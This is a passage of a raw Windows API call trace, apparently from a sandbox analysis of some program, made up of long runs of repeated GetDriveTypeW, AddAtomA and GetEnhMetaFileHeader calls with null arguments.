[0097.515] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.515] AddAtomA (lpString=0x0) returned 0x0 [0097.515] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.515] AddAtomA (lpString=0x0) returned 0x0 [0097.515] 
GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.515] AddAtomA (lpString=0x0) returned 0x0 [0097.515] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.515] AddAtomA (lpString=0x0) returned 0x0 [0097.515] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.515] AddAtomA (lpString=0x0) returned 0x0 [0097.515] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.515] AddAtomA (lpString=0x0) returned 0x0 [0097.515] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.515] AddAtomA (lpString=0x0) returned 0x0 [0097.515] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.515] AddAtomA (lpString=0x0) returned 0x0 [0097.515] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.515] AddAtomA (lpString=0x0) returned 0x0 [0097.515] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.515] AddAtomA (lpString=0x0) returned 0x0 [0097.515] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.515] AddAtomA (lpString=0x0) returned 0x0 [0097.515] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.515] AddAtomA (lpString=0x0) returned 0x0 [0097.515] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.515] AddAtomA (lpString=0x0) returned 0x0 [0097.515] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.515] AddAtomA (lpString=0x0) returned 0x0 [0097.515] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.515] AddAtomA (lpString=0x0) returned 0x0 [0097.515] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.516] AddAtomA (lpString=0x0) returned 0x0 [0097.516] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.516] AddAtomA (lpString=0x0) returned 0x0 [0097.516] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.516] AddAtomA (lpString=0x0) returned 0x0 [0097.516] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.516] AddAtomA (lpString=0x0) returned 0x0 [0097.516] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.516] AddAtomA (lpString=0x0) returned 0x0 [0097.516] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.516] AddAtomA 
(lpString=0x0) returned 0x0 [0097.516] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.516] AddAtomA (lpString=0x0) returned 0x0 [0097.516] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.516] AddAtomA (lpString=0x0) returned 0x0 [0097.516] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.516] AddAtomA (lpString=0x0) returned 0x0 [0097.516] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.516] AddAtomA (lpString=0x0) returned 0x0 [0097.516] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.516] AddAtomA (lpString=0x0) returned 0x0 [0097.516] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.516] AddAtomA (lpString=0x0) returned 0x0 [0097.516] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.516] AddAtomA (lpString=0x0) returned 0x0 [0097.516] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.516] AddAtomA (lpString=0x0) returned 0x0 [0097.516] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.516] AddAtomA (lpString=0x0) returned 0x0 [0097.516] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.517] AddAtomA (lpString=0x0) returned 0x0 [0097.517] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.517] AddAtomA (lpString=0x0) returned 0x0 [0097.517] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.517] AddAtomA (lpString=0x0) returned 0x0 [0097.517] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.517] AddAtomA (lpString=0x0) returned 0x0 [0097.517] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.517] AddAtomA (lpString=0x0) returned 0x0 [0097.517] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.517] AddAtomA (lpString=0x0) returned 0x0 [0097.517] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.517] AddAtomA (lpString=0x0) returned 0x0 [0097.517] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.517] AddAtomA (lpString=0x0) returned 0x0 [0097.517] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.517] AddAtomA (lpString=0x0) returned 0x0 [0097.517] GetDriveTypeW (lpRootPathName=0x0) 
returned 0x3 [0097.517] AddAtomA (lpString=0x0) returned 0x0 [0097.517] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.517] AddAtomA (lpString=0x0) returned 0x0 [0097.517] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.517] AddAtomA (lpString=0x0) returned 0x0 [0097.517] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.517] AddAtomA (lpString=0x0) returned 0x0 [0097.517] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.517] AddAtomA (lpString=0x0) returned 0x0 [0097.517] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.517] AddAtomA (lpString=0x0) returned 0x0 [0097.517] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.518] AddAtomA (lpString=0x0) returned 0x0 [0097.518] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.518] AddAtomA (lpString=0x0) returned 0x0 [0097.518] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.518] AddAtomA (lpString=0x0) returned 0x0 [0097.518] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.518] AddAtomA (lpString=0x0) returned 0x0 [0097.518] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.518] AddAtomA (lpString=0x0) returned 0x0 [0097.518] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.518] AddAtomA (lpString=0x0) returned 0x0 [0097.518] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.518] AddAtomA (lpString=0x0) returned 0x0 [0097.518] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.518] AddAtomA (lpString=0x0) returned 0x0 [0097.518] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.518] AddAtomA (lpString=0x0) returned 0x0 [0097.518] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.518] AddAtomA (lpString=0x0) returned 0x0 [0097.518] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.518] AddAtomA (lpString=0x0) returned 0x0 [0097.518] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.518] AddAtomA (lpString=0x0) returned 0x0 [0097.518] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.518] AddAtomA (lpString=0x0) returned 0x0 [0097.518] 
GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.518] AddAtomA (lpString=0x0) returned 0x0 [0097.518] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.519] AddAtomA (lpString=0x0) returned 0x0 [0097.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.519] AddAtomA (lpString=0x0) returned 0x0 [0097.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.519] AddAtomA (lpString=0x0) returned 0x0 [0097.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.519] AddAtomA (lpString=0x0) returned 0x0 [0097.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.519] AddAtomA (lpString=0x0) returned 0x0 [0097.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.519] AddAtomA (lpString=0x0) returned 0x0 [0097.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.519] AddAtomA (lpString=0x0) returned 0x0 [0097.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.519] AddAtomA (lpString=0x0) returned 0x0 [0097.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.519] AddAtomA (lpString=0x0) returned 0x0 [0097.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.519] AddAtomA (lpString=0x0) returned 0x0 [0097.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.519] AddAtomA (lpString=0x0) returned 0x0 [0097.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.519] AddAtomA (lpString=0x0) returned 0x0 [0097.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.519] AddAtomA (lpString=0x0) returned 0x0 [0097.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.519] AddAtomA (lpString=0x0) returned 0x0 [0097.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.519] AddAtomA (lpString=0x0) returned 0x0 [0097.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.520] AddAtomA (lpString=0x0) returned 0x0 [0097.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.520] AddAtomA (lpString=0x0) returned 0x0 [0097.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.520] AddAtomA 
(lpString=0x0) returned 0x0 [0097.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.520] AddAtomA (lpString=0x0) returned 0x0 [0097.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.520] AddAtomA (lpString=0x0) returned 0x0 [0097.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.520] AddAtomA (lpString=0x0) returned 0x0 [0097.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.520] AddAtomA (lpString=0x0) returned 0x0 [0097.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.520] AddAtomA (lpString=0x0) returned 0x0 [0097.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.520] AddAtomA (lpString=0x0) returned 0x0 [0097.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.520] AddAtomA (lpString=0x0) returned 0x0 [0097.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.520] AddAtomA (lpString=0x0) returned 0x0 [0097.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.520] AddAtomA (lpString=0x0) returned 0x0 [0097.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.520] AddAtomA (lpString=0x0) returned 0x0 [0097.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.520] AddAtomA (lpString=0x0) returned 0x0 [0097.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.521] AddAtomA (lpString=0x0) returned 0x0 [0097.521] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.521] AddAtomA (lpString=0x0) returned 0x0 [0097.521] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.521] AddAtomA (lpString=0x0) returned 0x0 [0097.521] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.521] AddAtomA (lpString=0x0) returned 0x0 [0097.521] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.521] AddAtomA (lpString=0x0) returned 0x0 [0097.521] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.521] AddAtomA (lpString=0x0) returned 0x0 [0097.521] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.521] AddAtomA (lpString=0x0) returned 0x0 [0097.521] GetDriveTypeW (lpRootPathName=0x0) 
returned 0x3 [0097.521] AddAtomA (lpString=0x0) returned 0x0 [0097.521] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.521] AddAtomA (lpString=0x0) returned 0x0 [0097.521] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.521] AddAtomA (lpString=0x0) returned 0x0 [0097.521] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.521] AddAtomA (lpString=0x0) returned 0x0 [0097.521] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.521] AddAtomA (lpString=0x0) returned 0x0 [0097.521] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.521] AddAtomA (lpString=0x0) returned 0x0 [0097.521] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.521] AddAtomA (lpString=0x0) returned 0x0 [0097.521] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.522] AddAtomA (lpString=0x0) returned 0x0 [0097.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.522] AddAtomA (lpString=0x0) returned 0x0 [0097.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.522] AddAtomA (lpString=0x0) returned 0x0 [0097.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.522] AddAtomA (lpString=0x0) returned 0x0 [0097.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.522] AddAtomA (lpString=0x0) returned 0x0 [0097.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.522] AddAtomA (lpString=0x0) returned 0x0 [0097.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.522] AddAtomA (lpString=0x0) returned 0x0 [0097.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.522] AddAtomA (lpString=0x0) returned 0x0 [0097.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.522] AddAtomA (lpString=0x0) returned 0x0 [0097.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.522] AddAtomA (lpString=0x0) returned 0x0 [0097.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.522] AddAtomA (lpString=0x0) returned 0x0 [0097.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.522] AddAtomA (lpString=0x0) returned 0x0 [0097.522] 
GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.522] AddAtomA (lpString=0x0) returned 0x0 [0097.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.522] AddAtomA (lpString=0x0) returned 0x0 [0097.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.522] AddAtomA (lpString=0x0) returned 0x0 [0097.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.523] AddAtomA (lpString=0x0) returned 0x0 [0097.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.523] AddAtomA (lpString=0x0) returned 0x0 [0097.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.523] AddAtomA (lpString=0x0) returned 0x0 [0097.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.523] AddAtomA (lpString=0x0) returned 0x0 [0097.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.523] AddAtomA (lpString=0x0) returned 0x0 [0097.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.523] AddAtomA (lpString=0x0) returned 0x0 [0097.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.523] AddAtomA (lpString=0x0) returned 0x0 [0097.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.523] AddAtomA (lpString=0x0) returned 0x0 [0097.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.523] AddAtomA (lpString=0x0) returned 0x0 [0097.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.523] AddAtomA (lpString=0x0) returned 0x0 [0097.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.523] AddAtomA (lpString=0x0) returned 0x0 [0097.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.523] AddAtomA (lpString=0x0) returned 0x0 [0097.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.523] AddAtomA (lpString=0x0) returned 0x0 [0097.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.523] AddAtomA (lpString=0x0) returned 0x0 [0097.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.524] AddAtomA (lpString=0x0) returned 0x0 [0097.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.524] AddAtomA 
(lpString=0x0) returned 0x0 [0097.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.524] AddAtomA (lpString=0x0) returned 0x0 [0097.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.524] AddAtomA (lpString=0x0) returned 0x0 [0097.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.524] AddAtomA (lpString=0x0) returned 0x0 [0097.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.524] AddAtomA (lpString=0x0) returned 0x0 [0097.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.524] AddAtomA (lpString=0x0) returned 0x0 [0097.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.525] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.525] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.525] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | 
out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] 
GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 
lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) 
returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.527] GetEnhMetaFileHeader (in: hemf=0x0, 
